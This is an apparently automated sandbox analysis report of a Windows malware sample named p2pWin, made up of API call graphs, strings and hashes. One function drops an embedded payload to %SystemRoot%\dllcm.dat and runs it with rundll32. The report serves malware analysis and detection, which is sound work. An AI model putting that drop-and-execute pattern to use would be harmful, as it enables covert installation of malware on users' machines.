33ccc _free 62 API calls 3212->3213 3214 34f62 3213->3214 3215 33ccc _free 62 API calls 3214->3215 3216 34f6d 3215->3216 3217 33ccc _free 62 API calls 3216->3217 3218 34f78 3217->3218 3219 33ccc _free 62 API calls 3218->3219 3220 34f83 3219->3220 3221 33ccc _free 62 API calls 3220->3221 3222 34f8e 3221->3222 3223 33ccc _free 62 API calls 3222->3223 3224 34f99 3223->3224 3225 33ccc _free 62 API calls 3224->3225 3226 34fa7 3225->3226 3227 33ccc _free 62 API calls 3226->3227 3228 34fb2 3227->3228 3229 33ccc _free 62 API calls 3228->3229 3230 34fbd 3229->3230 3231 33ccc _free 62 API calls 3230->3231 3232 34fc8 3231->3232 3233 33ccc _free 62 API calls 3232->3233 3234 34fd3 3233->3234 3235 33ccc _free 62 API calls 3234->3235 3235->3063 3236->2977 3240 328fd LeaveCriticalSection 3237->3240 3239 338ad 3239->2964 3240->3239 3242 33b20 __mtinitlocknum 3241->3242 3243 32296 __getptd 62 API calls 3242->3243 3244 33b29 3243->3244 3245 3380b _LocaleUpdate::_LocaleUpdate 64 API calls 3244->3245 3246 33b33 3245->3246 3272 338af 3246->3272 3249 33d65 __malloc_crt 62 API calls 3250 33b54 3249->3250 3251 33c73 __mtinitlocknum 3250->3251 3279 3392b 3250->3279 3251->2915 3254 33c80 3254->3251 3259 33c93 3254->3259 3260 33ccc _free 62 API calls 3254->3260 3255 33b84 InterlockedDecrement 3256 33ba5 InterlockedIncrement 3255->3256 3257 33b94 3255->3257 3256->3251 3258 33bbb 3256->3258 3257->3256 3262 33ccc _free 62 API calls 3257->3262 3258->3251 3263 329d6 __lock 62 API calls 3258->3263 3261 32e3f _malloc 62 API calls 3259->3261 3260->3259 3261->3251 3264 33ba4 3262->3264 3266 33bcf InterlockedDecrement 3263->3266 3264->3256 3267 33c4b 3266->3267 3268 33c5e InterlockedIncrement 3266->3268 3267->3268 3270 33ccc _free 62 API calls 3267->3270 3289 33c75 3268->3289 3271 33c5d 3270->3271 3271->3268 3273 334f6 _LocaleUpdate::_LocaleUpdate 72 API calls 3272->3273 3274 338c3 3273->3274 3275 338ce GetOEMCP 3274->3275 3276 338ec 3274->3276 3278 338de 3275->3278 3277 338f1 GetACP 3276->3277 3276->3278 3277->3278 3278->3249 3278->3251 3280 338af getSystemCP 74 API calls 3279->3280 3282 3394b 3280->3282 3281 339bf _memset __setmbcp_nolock 3292 3367b GetCPInfo 3281->3292 3282->3281 3283 33956 setSBCS 3282->3283 3286 3399a IsValidCodePage 3282->3286 3284 310e6 __call_reportfault 5 API calls 3283->3284 3285 33b12 3284->3285 3285->3254 3285->3255 3286->3283 3287 339ac GetCPInfo 3286->3287 3287->3281 3287->3283 3353 328fd LeaveCriticalSection 3289->3353 3291 33c7c 3291->3251 3294 336af _memset 3292->3294 3301 33763 3292->3301 3302 34a6a 3294->3302 3297 310e6 __call_reportfault 5 API calls 3299 33809 3297->3299 3299->3281 3300 3493d ___crtLCMapStringA 78 API calls 3300->3301 3301->3297 3303 334f6 _LocaleUpdate::_LocaleUpdate 72 API calls 3302->3303 3304 34a7d 3303->3304 3312 34983 3304->3312 3307 3493d 3308 334f6 _LocaleUpdate::_LocaleUpdate 72 API calls 3307->3308 3309 34950 3308->3309 3329 34756 3309->3329 3313 349a1 3312->3313 3314 349ac MultiByteToWideChar 3312->3314 3313->3314 3317 349d9 3314->3317 3324 349d5 3314->3324 3315 310e6 __call_reportfault 5 API calls 3318 3371e 3315->3318 3316 349ee _memset __alloca_probe_16 3319 34a27 MultiByteToWideChar 3316->3319 3316->3324 3317->3316 3320 34aaa _malloc 62 API calls 3317->3320 3318->3307 3321 34a4e 3319->3321 3322 34a3d GetStringTypeW 3319->3322 3320->3316 3325 34671 3321->3325 3322->3321 3324->3315 3326 3467d 3325->3326 3328 3468e 3325->3328 3327 33ccc _free 62 API calls 3326->3327 3326->3328 3327->3328 3328->3324 3330 34774 MultiByteToWideChar 3329->3330 3332 347d2 3330->3332 3334 347d9 3330->3334 3333 310e6 __call_reportfault 5 API calls 3332->3333 3336 3373e 3333->3336 3337 34aaa _malloc 62 API calls 3334->3337 3343 347f2 __alloca_probe_16 3334->3343 3335 34826 MultiByteToWideChar 3338 3491e 3335->3338 3339 3483f LCMapStringW 3335->3339 3336->3300 3337->3343 3341 34671 __freea 62 API calls 3338->3341 3339->3338 3340 3485e 3339->3340 3342 34868 3340->3342 3346 34891 3340->3346 3341->3332 3342->3338 3344 3487c LCMapStringW 3342->3344 3343->3332 3343->3335 3344->3338 3345 348e0 LCMapStringW 3347 348f6 WideCharToMultiByte 3345->3347 3348 34918 3345->3348 3349 348ac __alloca_probe_16 3346->3349 3350 34aaa _malloc 62 API calls 3346->3350 3347->3348 3351 34671 __freea 62 API calls 3348->3351 3349->3338 3349->3345 3350->3349 3351->3338 3353->3291 3355 33d14 3354->3355 3356 33d1b 3354->3356 3355->3356 3361 33d39 3355->3361 3357 32e3f _malloc 62 API calls 3356->3357 3358 33d20 3357->3358 3359 32db6 _strcpy_s 10 API calls 3358->3359 3360 33d2a 3359->3360 3360->2595 3361->3360 3362 32e3f _malloc 62 API calls 3361->3362 3362->3358 3364 32f92 EncodePointer 3363->3364 3364->3364 3365 32fac 3364->3365 3365->2612 3369 32f39 3366->3369 3368 32f82 3368->2614 3370 32f45 __mtinitlocknum 3369->3370 3377 3142e 3370->3377 3376 32f66 __mtinitlocknum 3376->3368 3378 329d6 __lock 62 API calls 3377->3378 3379 31435 3378->3379 3380 32e52 DecodePointer DecodePointer 3379->3380 3381 32f01 3380->3381 3382 32e80 3380->3382 3391 32f6f 3381->3391 3382->3381 3394 3471a 3382->3394 3384 32ee4 EncodePointer EncodePointer 3384->3381 3385 32e92 3385->3384 3386 32eb6 3385->3386 3401 33df6 3385->3401 3386->3381 3388 33df6 __realloc_crt 66 API calls 3386->3388 3389 32ed2 EncodePointer 3386->3389 3390 32ecc 3388->3390 3389->3384 3390->3381 3390->3389 3424 31437 3391->3424 3395 34725 3394->3395 3396 3473a HeapSize 3394->3396 3397 32e3f _malloc 62 API calls 3395->3397 3396->3385 3398 3472a 3397->3398 3399 32db6 _strcpy_s 10 API calls 3398->3399 3400 34735 3399->3400 3400->3385 3403 33dff 3401->3403 3404 33e3e 3403->3404 3405 33e1f Sleep 3403->3405 3406 34bc0 3403->3406 3404->3386 3405->3403 3407 34bd6 3406->3407 3408 34bcb 3406->3408 3410 34bde 3407->3410 3417 34beb _malloc 3407->3417 3409 34aaa _malloc 62 API calls 3408->3409 3411 34bd3 3409->3411 3412 33ccc _free 62 API calls 3410->3412 3411->3403 3423 34be6 _free 3412->3423 3413 34c23 _malloc 3415 32e3f _malloc 62 API calls 3413->3415 3414 34bf3 HeapReAlloc 3414->3417 3414->3423 3415->3423 3416 34c53 3418 32e3f _malloc 62 API calls 3416->3418 3417->3413 3417->3414 3417->3416 3420 34c3b 3417->3420 3419 34c58 GetLastError 3418->3419 3419->3423 3421 32e3f _malloc 62 API calls 3420->3421 3422 34c40 GetLastError 3421->3422 3422->3423 3423->3403 3427 328fd LeaveCriticalSection 3424->3427 3426 3143e 3426->3376 3427->3426 3429 31009 3428->3429 3430 3100d 8 API calls 3428->3430 3429->2623 3430->2623 3432 3153a __mtinitlocknum 3431->3432 3433 329d6 __lock 57 API calls 3432->3433 3434 31541 3433->3434 3436 3156c DecodePointer 3434->3436 3440 315eb 3434->3440 3438 31583 DecodePointer 3436->3438 3436->3440 3450 31596 3438->3450 3439 31668 __mtinitlocknum 3439->2628 3452 31659 3440->3452 3443 31650 3444 31416 _fast_error_exit 3 API calls 3443->3444 3445 31659 3444->3445 3446 31666 3445->3446 3459 328fd LeaveCriticalSection 3445->3459 3446->2628 3447 315ad DecodePointer 3458 320e6 EncodePointer 3447->3458 3450->3440 3450->3447 3451 315bc DecodePointer DecodePointer 3450->3451 3457 320e6 EncodePointer 3450->3457 3451->3450 3453 31639 3452->3453 3454 3165f 3452->3454 3453->3439 3456 328fd LeaveCriticalSection 3453->3456 3460 328fd LeaveCriticalSection 3454->3460 3456->3443 3457->3450 3458->3450 3459->3446 3460->3453 3462 3152e _doexit 62 API calls 3461->3462 3463 31695 3462->3463

                                                Executed Functions

                                                Function 00031070 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00031000: GetProcessHeap.KERNEL32(00000008,00000104), ref: 0003101D
                                                  • Part of subcall function 00031000: HeapAlloc.KERNEL32(00000000), ref: 00031026
                                                  • Part of subcall function 00031000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104), ref: 00031034
                                                  • Part of subcall function 00031000: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00031041
                                                  • Part of subcall function 00031000: HeapAlloc.KERNEL32(00000000), ref: 00031044
                                                  • Part of subcall function 00031000: GetFullPathNameA.KERNEL32(00000000,00000104,00000000,00000000), ref: 00031051
                                                  • Part of subcall function 00031000: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0003105A
                                                  • Part of subcall function 00031000: HeapFree.KERNEL32(00000000), ref: 0003105D
                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 000310A4
                                                • WriteFile.KERNELBASE(00000000,00037830,00058778,?,00000000), ref: 000310BD
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 000310C4
                                                • ShellExecuteA.SHELL32(00000000,00000000,rundll32.exe,00000000,00000000,0000000A), ref: 000310D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocFile$ChangeCloseCreateEnvironmentExecuteExpandFindFreeFullNameNotificationPathShellStringsWrite
                                                • String ID: %SystemRoot%\dllcm.dat$%SystemRoot%\dllcm.dat #1$rundll32.exe
                                                • API String ID: 2615097910-798080983
                                                • Opcode ID: aa3b410081f3fa46424a55e8da36aad3c861bf5234598dc4a406de0b9c447c92
                                                • Instruction ID: d3cff6220ead535f89410b65e78c3ccdffd9c345ca9ba5859562565d6a501d54
                                                • Opcode Fuzzy Hash: aa3b410081f3fa46424a55e8da36aad3c861bf5234598dc4a406de0b9c447c92
                                                • Instruction Fuzzy Hash: 3DF05E367C432476F23623A4AC0BF9B365C9B4AF52F204121FB45FE0C299E5690183F9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00031416 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 31416-31427 call 313eb ExitProcess
                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 0003141E
                                                  • Part of subcall function 000313EB: GetModuleHandleW.KERNEL32(mscoree.dll,?,00031423,?,?,00034AD9,000000FF,0000001E,00000001,00000000,00000000,?,00033D76,?,00000001,?), ref: 000313F5
                                                  • Part of subcall function 000313EB: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00031405
                                                • ExitProcess.KERNEL32 ref: 00031427
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0
                                                • Opcode ID: 768de72cfd659ca3d3f86a6b32d43c533b43e0c705e84228b245ebed7cac69c3
                                                • Instruction ID: 05e78ea67682f543936c837c20d1fbe6baa957b9afcc784e075a5381592e11f1
                                                • Opcode Fuzzy Hash: 768de72cfd659ca3d3f86a6b32d43c533b43e0c705e84228b245ebed7cac69c3
                                                • Instruction Fuzzy Hash: 44B09B310041087BDB072F51DC0A88D3F2DEB41751B104010F50505031DF729D529990
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00034B3E Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 8 34b3e-34b48 9 34b65-34b6e 8->9 10 34b4a-34b54 8->10 12 34b71-34b76 9->12 13 34b70 9->13 10->9 11 34b56-34b64 call 32e3f 10->11 15 34b8b-34b92 12->15 16 34b78-34b89 RtlAllocateHeap 12->16 13->12 19 34bb0-34bb5 15->19 20 34b94-34b9d call 32dd5 15->20 16->15 18 34bbd-34bbf 16->18 19->18 21 34bb7 19->21 20->12 24 34b9f-34ba4 20->24 21->18 25 34ba6 24->25 26 34bac-34bae 24->26 25->26 26->18
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00033DC0,?,?,00000000,00000000,00000000,?,00032248,00000001,00000214,?,00031737), ref: 00034B81
                                                  • Part of subcall function 00032E3F: __getptd_noexit.LIBCMT ref: 00032E3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap__getptd_noexit
                                                • String ID:
                                                • API String ID: 328603210-0
                                                • Opcode ID: 952ff98fc0cadc77007566ef133357633b00a21b581a23617f955a5f393ecbd3
                                                • Instruction ID: 91f080b8139c7a8211ba70f2005a695ea46cf937a36ef891e033389d40e67a08
                                                • Opcode Fuzzy Hash: 952ff98fc0cadc77007566ef133357633b00a21b581a23617f955a5f393ecbd3
                                                • Instruction Fuzzy Hash: B701F2312012159BEB6B9F25DC58F6BB7DCEFC07A0F014629E815CF290DB38EC008690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0003166E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 27 3166e-3167a call 3152e 29 3167f-31683 27->29
                                                APIs
                                                • _doexit.LIBCMT ref: 0003167A
                                                  • Part of subcall function 0003152E: __lock.LIBCMT ref: 0003153C
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(000900E0,00000020,00031695,?,00000001,00000000,?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D), ref: 00031578
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 00031589
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(-00000004,?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 000315AF
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 000315C2
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 000315CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer$__lock_doexit
                                                • String ID:
                                                • API String ID: 3343572566-0
                                                • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                • Instruction ID: 1a60604d6656ddd58536fa63dbef2e81f9f17d852e610918cbb64c7af1340e2d
                                                • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                • Instruction Fuzzy Hash: 10B0923268020873DA212642EC03F863A0D87C4B60E240020BA0D191A2A9A2A9628089
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00031000 Relevance: 12.0, APIs: 8, Instructions: 45memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0003101D
                                                • HeapAlloc.KERNEL32(00000000), ref: 00031026
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104), ref: 00031034
                                                • GetProcessHeap.KERNEL32(00000008,00000104), ref: 00031041
                                                • HeapAlloc.KERNEL32(00000000), ref: 00031044
                                                • GetFullPathNameA.KERNEL32(00000000,00000104,00000000,00000000), ref: 00031051
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0003105A
                                                • HeapFree.KERNEL32(00000000), ref: 0003105D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$Alloc$EnvironmentExpandFreeFullNamePathStrings
                                                • String ID:
                                                • API String ID: 3786712135-0
                                                • Opcode ID: 1ecdee25d2b0e590f70487ed8149a3f6a0df7211c4bf1742bfacce9ed6c57691
                                                • Instruction ID: 4eb43385765eeaa30e39d49eefb011545b2446dd85c47a5f364b35da87154050
                                                • Opcode Fuzzy Hash: 1ecdee25d2b0e590f70487ed8149a3f6a0df7211c4bf1742bfacce9ed6c57691
                                                • Instruction Fuzzy Hash: B7F030B62412087BF611A7A9AC8AF9B7A9CEB89769F008011F34CC6190C9F5884087B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000310E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00031350
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00031365
                                                • UnhandledExceptionFilter.KERNEL32(0003614C), ref: 00031370
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0003138C
                                                • TerminateProcess.KERNEL32(00000000), ref: 00031393
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 37fa4b28edff6a76ae7c937073079bd5386698b4329d645ee3526e0bd84d3bed
                                                • Instruction ID: 9a854523d115cc9de3b8260b0ec97ea15ab1ee432f107bc34425c9fe086e3868
                                                • Opcode Fuzzy Hash: 37fa4b28edff6a76ae7c937073079bd5386698b4329d645ee3526e0bd84d3bed
                                                • Instruction Fuzzy Hash: 0C2123B8681206EFE706DF68E9856D43BB8BB08351F10841BE51887371EBB999818F08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000323DF Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 109libraryloadermemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 319 323df-323f1 GetModuleHandleW 320 323f3-323fb call 3212c 319->320 321 323fc-32444 GetProcAddress * 4 319->321 323 32446-3244d 321->323 324 3245c-3247b 321->324 323->324 326 3244f-32456 323->326 327 32480-3248e TlsAlloc 324->327 326->324 328 32458-3245a 326->328 329 32555 327->329 330 32494-3249f TlsSetValue 327->330 328->324 328->327 331 32557-32559 329->331 330->329 332 324a5-324eb call 31440 EncodePointer * 4 call 3285c 330->332 337 32550 call 3212c 332->337 338 324ed-3250a DecodePointer 332->338 337->329 338->337 341 3250c-3251e call 33daa 338->341 341->337 344 32520-32533 DecodePointer 341->344 344->337 346 32535-3254e call 32169 GetCurrentThreadId 344->346 346->331
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000311A8), ref: 000323E7
                                                • __mtterm.LIBCMT ref: 000323F3
                                                  • Part of subcall function 0003212C: DecodePointer.KERNEL32(00000004,00032555,?,000311A8), ref: 0003213D
                                                  • Part of subcall function 0003212C: TlsFree.KERNEL32(0000000C,00032555,?,000311A8), ref: 00032157
                                                  • Part of subcall function 0003212C: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00032555,?,000311A8), ref: 000328C3
                                                  • Part of subcall function 0003212C: _free.LIBCMT ref: 000328C6
                                                  • Part of subcall function 0003212C: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,00032555,?,000311A8), ref: 000328ED
                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00032409
                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00032416
                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00032423
                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00032430
                                                • TlsAlloc.KERNEL32(?,000311A8), ref: 00032480
                                                • TlsSetValue.KERNEL32(00000000,?,000311A8), ref: 0003249B
                                                • __init_pointers.LIBCMT ref: 000324A5
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324B6
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324C3
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324D0
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324DD
                                                • DecodePointer.KERNEL32(000322B0,?,000311A8), ref: 000324FE
                                                • __calloc_crt.LIBCMT ref: 00032513
                                                • DecodePointer.KERNEL32(00000000,?,000311A8), ref: 0003252D
                                                • GetCurrentThreadId.KERNEL32 ref: 0003253F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
                                                • API String ID: 3698121176-2259100434
                                                • Opcode ID: da18032fc11fee9e19ea1fa65cbe42afc434084aea8a5bfb5ce94b0b4be0c1b0
                                                • Instruction ID: 3e13074b941b164ae6191f9522ac2a8d3afe372a5b8898d18796e98917fd4c00
                                                • Opcode Fuzzy Hash: da18032fc11fee9e19ea1fa65cbe42afc434084aea8a5bfb5ce94b0b4be0c1b0
                                                • Instruction Fuzzy Hash: 3B316D31900B10BFE757AB75AC2965A3BE8FB46360B12851BE540D32B0EB7E9445CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00032169 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00090100,00000008,00032271,00000000,00000000,?,00031737,00000003), ref: 0003217A
                                                • __lock.LIBCMT ref: 000321AE
                                                  • Part of subcall function 000329D6: __mtinitlocknum.LIBCMT ref: 000329EC
                                                  • Part of subcall function 000329D6: __amsg_exit.LIBCMT ref: 000329F8
                                                  • Part of subcall function 000329D6: EnterCriticalSection.KERNEL32(?,?,?,000321B3,0000000D,?,00031737,00000003), ref: 00032A00
                                                • InterlockedIncrement.KERNEL32(00091320), ref: 000321BB
                                                • __lock.LIBCMT ref: 000321CF
                                                • ___addlocaleref.LIBCMT ref: 000321ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                • String ID: KERNEL32.DLL
                                                • API String ID: 637971194-2576044830
                                                • Opcode ID: da002d6f8f3c6a489cda9c32feee5d023a3df4d70a476f1eb2dbbedeb8e72840
                                                • Instruction ID: 3f5a80a8104864e7d2ccab9a7c335f6c5eaad072ea7281d7b8a53b00bef92b5c
                                                • Opcode Fuzzy Hash: da002d6f8f3c6a489cda9c32feee5d023a3df4d70a476f1eb2dbbedeb8e72840
                                                • Instruction Fuzzy Hash: 88018471500B01EFE722AF65D80678AFBF4BF00324F10890EE5D5567A2CBB4A684CF21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0003380B Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __getptd.LIBCMT ref: 00033817
                                                  • Part of subcall function 00032296: __getptd_noexit.LIBCMT ref: 00032299
                                                  • Part of subcall function 00032296: __amsg_exit.LIBCMT ref: 000322A6
                                                • __amsg_exit.LIBCMT ref: 00033837
                                                • __lock.LIBCMT ref: 00033847
                                                • InterlockedDecrement.KERNEL32(?), ref: 00033864
                                                • _free.LIBCMT ref: 00033877
                                                • InterlockedIncrement.KERNEL32(00FE1660), ref: 0003388F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
